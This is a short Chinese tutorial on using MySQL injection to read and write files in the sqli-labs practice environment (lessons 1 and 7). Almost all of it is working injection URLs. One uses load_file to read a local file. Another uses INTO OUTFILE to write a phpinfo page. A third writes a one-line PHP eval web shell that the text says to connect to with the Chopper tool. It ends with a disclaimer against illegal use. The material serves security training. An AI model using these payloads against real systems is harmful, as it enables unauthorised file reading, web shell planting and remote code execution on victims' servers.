小课堂 -- Mysql读写文件

读取文件

less 1

先在c盘新建一个名为123的txt文件

，然后访问http://192.168.1.119/sqli/Less-1/?id=-1' UNION SELECT 1, load_file("C:\\123.txt"),3 --+

 

写入文件

less 7

自动写入一个内容为"<?php phpinfo();?>"的文件

http://192.168.1.119/sqli/Less-7/?id=-1')) union select 1,"<?php phpinfo();?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\123456.php" --+

 

写入webshell

less 7

生成一句话木马

http://192.168.1.119/sqli/Less-7/?id=-1')) union select 1,"<?php @eval（$_POST['chopper']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\123456.php" --+

用菜刀连接该文件

 

禁止非法，后果自负